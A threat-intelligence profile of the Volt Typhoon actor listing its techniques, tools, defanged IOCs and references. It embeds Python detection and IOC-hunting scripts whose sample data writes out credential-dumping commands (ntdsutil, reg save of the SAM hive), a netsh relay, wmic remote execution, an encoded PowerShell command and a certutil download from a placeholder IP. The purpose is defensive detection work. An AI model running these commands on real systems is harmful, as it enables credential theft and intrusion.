DFIRLab

Security research, threat intelligence, and detection engineering.

© 2026 DFIR Lab. All rights reserved.


Volt Typhoon

Also known as: VANGUARD PANDA, Bronze Silhouette, DEV-0391, Insidious Taurus, UNC3236, Redfly, Storm-0391, VOLTZITE

Status: Active | Type: Nation-State | Origin: China | MITRE: G1017

Campaigns: 0
Techniques: 32
IOCs: 4
Tools: 16
Matches: 0
Infrastructure: 3

Overview

Volt Typhoon is a Chinese state-sponsored threat actor focused on pre-positioning for potential disruptive or destructive operations against U.S. critical infrastructure. First publicly disclosed by Microsoft on 24 May 2023, the group has been active since at least mid-2021 and marks a shift in Chinese cyber operations from traditional espionage toward operational preparation of the environment (OPE). The group relies almost entirely on living-off-the-land (LOTL) tradecraft: instead of custom malware it uses built-in Windows tools, legitimate network administration utilities, hands-on-keyboard activity, and compromised SOHO routers acting as operational relay boxes (ORBs) so that its command-and-control traffic emerges from ordinary residential and small-business IP space. Because the activity looks like routine administration, detection depends on baselining and correlating otherwise benign commands rather than on malware signatures. Volt Typhoon has compromised organizations across the communications, energy, transportation, and water/wastewater sectors. U.S. agencies assess that the group's operations are designed to maintain persistent, long-term access to critical infrastructure networks that could be leveraged for disruptive effects during a crisis or conflict with the United States, such as one over the Taiwan Strait.

Motivations

Pre-positioning, Critical Infrastructure Access, Strategic Deterrence

Target Sectors

Critical Infrastructure, Communications, Energy, Water/Wastewater, Transportation, Government, Defense Industrial Base, Maritime, Oil and Gas, Manufacturing, Construction, Education, Information Technology, Telecommunications, Aviation

Activity Timeline

First Seen: Jan 2021

Last Seen: Jan 2024

Quick Facts

Origin: China
Sophistication: Nation-state
Status: Active
MITRE Group: G1017

MITRE ATT&CK Techniques

(32)

Initial Access

T1190

Exploit Public-Facing Application

Exploit vulnerabilities in internet-facing applications to gain access.

T1133

External Remote Services

Abuse remote services like VPNs or RDP to gain access to the network.

T1078

Valid Accounts

Use legitimate credentials to authenticate and gain access.

Execution

T1059.001

PowerShell

Use PowerShell commands and scripts for execution and automation.

T1059.003

Windows Command Shell

Use cmd.exe to execute commands and batch scripts.

Other

T1218.011

System Binary Proxy Execution: Rundll32

T1003.003

OS Credential Dumping: NTDS

T1016

System Network Configuration Discovery

T1049

System Network Connections Discovery

T1057

Process Discovery

T1090.002

Proxy: External Proxy

T1584.008

Compromise Infrastructure: Network Devices

T1112

Modify Registry

T1090.001

Proxy: Internal Proxy

T1584.004

Compromise Infrastructure: Server

T1027.002

Obfuscated Files or Information: Software Packing

T1021.004

Remote Services: SSH

T1069.002

Permission Groups Discovery: Domain Groups

T1087.002

Account Discovery: Domain Account

T1560.001

Archive Collected Data: Archive via Utility

T1136.001

Create Account: Local Account

T1136.002

Create Account: Domain Account

T1505.003

Server Software Component: Web Shell

T1550.002

Use Alternate Authentication Material: Pass the Hash

T1550.003

Use Alternate Authentication Material: Pass the Ticket

T1021.006

Remote Services: Windows Remote Management

T1036.004

Masquerading: Masquerade Task or Service

Credential Access

T1003.001

LSASS Memory

Access LSASS process memory to extract credential material.

Discovery

T1046

Network Service Discovery

Scan for services running on remote hosts across the network.

T1018

Remote System Discovery

Discover remote systems on the network for lateral movement targets.

Command and Control

T1105

Ingress Tool Transfer

Download additional tools or payloads from an external system.

Lateral Movement

T1021.001

Remote Desktop Protocol

Use RDP to connect to and control remote systems.

Tools & Malware

(16)

PowerShell

OS utility / Legitimate

Primary tool for reconnaissance and command execution. Used with encoded commands to query Active Directory, enumerate network shares, and gather system information without deploying malware.

ntdsutil

OS utility / Legitimate

Windows utility abused to create an Install-From-Media (IFM) snapshot of the Active Directory database (NTDS.dit) together with the SYSTEM hive, which is then taken off-host for offline credential extraction and domain-wide access.

netsh

OS utility / Legitimate

Used to configure port proxying (netsh interface portproxy) and firewall rules on compromised systems, turning an internal host into a relay that forwards traffic toward the group's operational relay network.

wmic

OS utility / Legitimate

Windows Management Instrumentation command-line client used for remote process execution, system enumeration, and lateral movement without deploying additional tools.

certutil

OS utility / Legitimate

Abused for file transfers (downloading tools from C2 via -urlcache), Base64 encoding/decoding, and certificate manipulation on compromised systems.

ldifde

OS utility / Legitimate

Active Directory utility used to export directory data (users, groups, computers) for offline analysis, mapping organizational structure and identifying high-value targets.

FRP (Fast Reverse Proxy)

Legitimate tool

Open-source reverse proxy used to create tunnels from compromised networks to external C2 infrastructure, often deployed as modified or renamed binaries.

Impacket

Framework / Legitimate

Python toolkit used for wmiexec remote execution, secretsdump credential extraction, and SMB relay attacks during lateral movement phases.

Mimikatz

Framework / Legitimate

Deployed sparingly for credential extraction. Volt Typhoon prefers offline extraction from NTDS.dit to avoid triggering LSASS memory access alerts.

Earthworm

Legitimate tool

SOCKS5 proxy tool used to create multi-hop tunnels through compromised systems, enabling access to isolated network segments.

cmd.exe

OS utility / Legitimate

Command interpreter used to chain living-off-the-land binaries and run batch scripts for reconnaissance.

SOHO Router Exploitation

Exploit activity / Malicious

Compromises internet-facing edge devices and SOHO routers (Fortinet, ASUS, Cisco, D-Link, Netgear, Zyxel) to build operational relay box (ORB) networks that proxy C2 traffic through residential and small-business IP space.

Nmap

Legitimate tool

Network scanner used for initial reconnaissance of target infrastructure, port scanning, and service enumeration.

Advanced IP Scanner

Legitimate tool

GUI-based network scanner used to map internal network topology, identify live hosts, and discover shared resources on compromised networks.

PsExec

Legitimate tool

Sysinternals utility used for remote command execution on Windows systems; enables lateral movement with harvested credentials.

reg.exe

OS utility / Legitimate

Registry command-line tool used to query and modify keys for persistence, to disable security features, and to save the SAM, SYSTEM and SECURITY hives to disk for offline credential extraction.
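The abuse described in the tool entries above (an ntdsutil IFM snapshot, a netsh portproxy listener, reg save of the SAM hive, wmic remote process creation, a certutil download, an ldifde export, an encoded PowerShell command) leaves almost nothing on disk, so it has to be caught from process command-line telemetry. The following script is an added example, not DFIRLab's tooling: it encodes those patterns as regexes tagged with the ATT&CK technique each maps to, runs them over constructed process-creation records shaped like parsed Sysmon Event ID 1 or Security 4688 data, and then correlates per host, because a single LOTL command is usually explainable while several distinct techniques on one host are not. The regexes, hostnames, usernames and paths are assumptions made for the example.

```python
"""Command-line detection for the LOTL tradecraft listed in the Tools section.

Added example, not DFIRLab's tooling. Rules are regexes over the process
command line, tagged with the ATT&CK technique each abuse maps to. The sample
events are constructed for this example (hosts, users and paths are made up);
in practice feed it parsed Sysmon Event ID 1 or Security 4688 records.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    pattern: re.Pattern


# Patterns are assumptions about what each abuse looks like on the wire;
# baseline them against your own administrative activity before alerting.
RULES = [
    Rule("ntdsutil IFM snapshot of NTDS.dit", "T1003.003",
         re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b.*\bcreate\b", re.I)),
    Rule("netsh portproxy listener added", "T1090.001",
         re.compile(r"\bnetsh(\.exe)?\b.*\binterface\b.*\bportproxy\b.*\badd\b", re.I)),
    Rule("registry hive saved to disk (SAM/SYSTEM/SECURITY)", "T1003.002",
         re.compile(r"\breg(\.exe)?\b\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    Rule("wmic remote process creation", "T1047",
         re.compile(r"\bwmic(\.exe)?\b.*/node:.*\bprocess\b.*\bcall\b.*\bcreate\b", re.I)),
    Rule("certutil used to download a file", "T1105",
         re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    Rule("ldifde directory export", "T1087.002",
         re.compile(r"\bldifde(\.exe)?\b.*\s-f\s", re.I)),
    Rule("encoded PowerShell command", "T1059.001",
         re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s", re.I)),
]

# Constructed process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "dc01", "user": r"CORP\svc_backup",
     "cmd": r'ntdsutil.exe "ac i ntds" ifm "create full C:\Windows\Temp\pro" q q'},
    {"host": "dc01", "user": r"CORP\svc_backup",
     "cmd": r"reg save hklm\sam C:\Windows\Temp\sam.hiv"},
    {"host": "dc01", "user": r"CORP\svc_backup",
     "cmd": r'ldifde.exe -f C:\Windows\Temp\users.ldf -s dc01 -d "dc=corp,dc=local"'},
    {"host": "web02", "user": r"NT AUTHORITY\SYSTEM",
     "cmd": "netsh interface portproxy add v4tov4 listenport=9999 "
            "listenaddress=0.0.0.0 connectport=8443 connectaddress=10.1.2.3"},
    {"host": "ws17", "user": r"CORP\jdoe",
     "cmd": r'wmic /node:"fs01" process call create "cmd.exe /c whoami > C:\Windows\Temp\o.txt"'},
    {"host": "ws17", "user": r"CORP\jdoe",
     "cmd": r"certutil.exe -urlcache -split -f http://203.0.113.10/frpc.exe C:\Users\Public\frpc.exe"},
    {"host": "ws03", "user": r"CORP\admin",   # benign scripted backup: no encoded command
     "cmd": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"host": "fs01", "user": r"CORP\jdoe",
     "cmd": "powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]


def scan(events, rules=RULES):
    """Return one (host, user, technique, rule name) tuple per rule that fires."""
    hits = []
    for ev in events:
        for rule in rules:
            if rule.pattern.search(ev["cmd"]):
                hits.append((ev["host"], ev["user"], rule.technique, rule.name))
    return hits


def hosts_with_multiple_techniques(hits, min_techniques=2):
    """Map host -> sorted technique IDs for hosts where several distinct
    techniques fired. One LOTL command is usually explainable; the same host
    saving hives, snapshotting NTDS.dit and exporting the directory is not."""
    per_host = {}
    for host, _user, technique, _name in hits:
        per_host.setdefault(host, set()).add(technique)
    return {h: sorted(t) for h, t in per_host.items() if len(t) >= min_techniques}


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for hit in found:
        print(hit)
    print(hosts_with_multiple_techniques(found))
```

On the constructed input the benign backup script on ws03 produces no hit, while dc01 accumulates three distinct credential and directory techniques, which is the kind of per-host stacking worth paging on even though each command alone is routine administration.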

Indicators of Compromise

(4)

IOC values are defanged for safety.

Type | Value | Notes
ip | 104[.]161[.]54[.]203 | Compromised SOHO router used as relay infrastructure
ip | 185[.]106[.]92[.]12 | Operational relay box (ORB) infrastructure
domain | gosloede[.]com | C2 domain identified in critical infrastructure targeting
hash | baeffeb5fdef2f42a752c65c2d2a52e84fb57efc906d981f89dd518c314e231c | Modified FRP binary used for tunneling (SHA-256)
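The table defangs values so they cannot be resolved or clicked by accident; to use them in a hunt they must be refanged and matched against live logs, with the extra care that a C2 domain should also match its subdomains and a hash should match regardless of case. The script below is an added example, not DFIRLab's code: it refangs the four indicators listed above, classifies them by type, and scans constructed firewall, DNS and EDR log lines (made up for the example, describing no real traffic) for them.

```python
"""Refang the IOCs in the table above and hunt for them in log lines.

Added example, not DFIRLab's code. The indicator values are the four listed
on this page; the log lines are constructed for the example and describe no
real traffic.
"""
import re

# Copied from the IOC table on this page, still defanged.
DEFANGED_IOCS = {
    "104[.]161[.]54[.]203": "Compromised SOHO router used as relay infrastructure",
    "185[.]106[.]92[.]12": "Operational relay box (ORB) infrastructure",
    "gosloede[.]com": "C2 domain identified in critical infrastructure targeting",
    "baeffeb5fdef2f42a752c65c2d2a52e84fb57efc906d981f89dd518c314e231c":
        "Modified FRP binary used for tunneling (SHA-256)",
}

# Common defanging conventions: [.] (.) {.} " dot ", hxxp(s)://, [@].
_DEFANG_SUBS = [
    (re.compile(r"\[\.\]|\(\.\)|\{\.\}|\s+dot\s+", re.I), "."),
    (re.compile(r"hxxps?://", re.I), lambda m: m.group(0).lower().replace("hxxp", "http")),
    (re.compile(r"\[@\]|\(@\)"), "@"),
]

IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")
SHA256 = re.compile(r"^[0-9a-f]{64}$", re.I)
DOMAIN = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
# Tokens worth checking in a log line: runs of letters, digits, dots, dashes.
TOKEN = re.compile(r"[A-Za-z0-9.\-]+")


def refang(value):
    """Undo the defanging so the value can be compared with live log data."""
    v = value.strip()
    for pat, repl in _DEFANG_SUBS:
        v = pat.sub(repl, v)
    return v


def classify(value):
    if IPV4.match(value):
        return "ip"
    if SHA256.match(value):
        return "hash"
    if DOMAIN.match(value):
        return "domain"
    return "unknown"


def build_index(defanged):
    """Refang and bucket the IOCs by type, keyed lower-case for matching."""
    idx = {"ip": {}, "domain": {}, "hash": {}}
    for raw, note in defanged.items():
        val = refang(raw)
        kind = classify(val)
        if kind == "unknown":
            raise ValueError(f"unrecognised IOC {raw!r}")
        idx[kind][val.lower()] = note
    return idx


def hunt(lines, idx):
    """Return (line_no, kind, indicator, note) for each IOC seen in the lines.
    IPs and hashes match exactly (hashes case-insensitively); a domain matches
    the host itself or any subdomain of it."""
    hits = []
    for n, line in enumerate(lines, 1):
        for tok in TOKEN.findall(line):
            t = tok.lower().strip(".")
            if t in idx["ip"]:
                hits.append((n, "ip", t, idx["ip"][t]))
            elif t in idx["hash"]:
                hits.append((n, "hash", t, idx["hash"][t]))
            else:
                labels = t.split(".")
                for i in range(len(labels) - 1):   # walk up: a.b.c -> b.c
                    cand = ".".join(labels[i:])
                    if cand in idx["domain"]:
                        hits.append((n, "domain", cand, idx["domain"][cand]))
                        break
    return hits


# Constructed firewall / DNS / EDR lines for the example; not real data.
SAMPLE_LOGS = [
    "2024-01-12T03:14:07Z fw01 TCP 10.20.1.44:51233 -> 104.161.54.203:443 ALLOW",
    "2024-01-12T03:14:09Z dns01 query A update.gosloede.com from 10.20.1.44",
    "2024-01-12T03:15:22Z edr ws17 file_create C:\\Users\\Public\\svchost.exe "
    "sha256=BAEFFEB5FDEF2F42A752C65C2D2A52E84FB57EFC906D981F89DD518C314E231C",
    "2024-01-12T03:16:01Z fw01 TCP 10.20.1.44:51240 -> 8.8.8.8:53 ALLOW",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOGS, build_index(DEFANGED_IOCS)):
        print(hit)
```

Matching on tokens rather than substrings avoids the classic false positive where an IOC IP is a prefix of an unrelated address, and the subdomain walk means a lookup for update.gosloede.com is attributed to the listed C2 domain rather than missed.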

Infrastructure

(3)

Domain values are defanged for safety.

Domain / Host | Type | Status | Last Checked | Notes
104[.]161[.]54[.]203 | ip | offline | Apr 2, 2026 | Compromised SOHO router used as relay infrastructure
185[.]106[.]92[.]12 | ip | offline | Apr 2, 2026 | Operational relay box (ORB) infrastructure
gosloede[.]com | c2 | offline | Apr 2, 2026 | C2 domain identified in critical infrastructure targeting

Infrastructure data reflects monitoring status only — no raw fingerprint data is exposed.

References

(9)

Microsoft Threat Intelligence - Volt Typhoon targets US critical infrastructure with living-off-the-land techniques

https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

CISA - AA24-038A: PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure

https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a

CrowdStrike - Falcon Complete Thwarts VANGUARD PANDA Tradecraft

https://www.crowdstrike.com/blog/falcon-complete-thwarts-vanguard-panda-tradecraft/

Dragos - 2026 OT/ICS Cybersecurity Year in Review: VOLTZITE Elevated to Stage 2

https://www.dragos.com/resources/press-release/dragos-2026-year-in-review-new-ot-threats-ransomware

The Record - Volt Typhoon Maintained Access to Massachusetts Utility for 10 Months

https://therecord.media/volt-typhoon-hackers-utility-months

The Record - Dragos: Researchers Warn Volt Typhoon Still Embedded in US Utilities

https://therecord.media/researchers-warn-volt-typhoon-still-active-critical-infrastructure

CISA - AA23-144A: People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

NSA/FBI/CISA Joint Cybersecurity Advisory - People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection (PDF)

https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

Secureworks - Bronze Silhouette Targets US Critical Infrastructure

https://www.secureworks.com/research/bronze-silhouette-targets-us-critical-infrastructure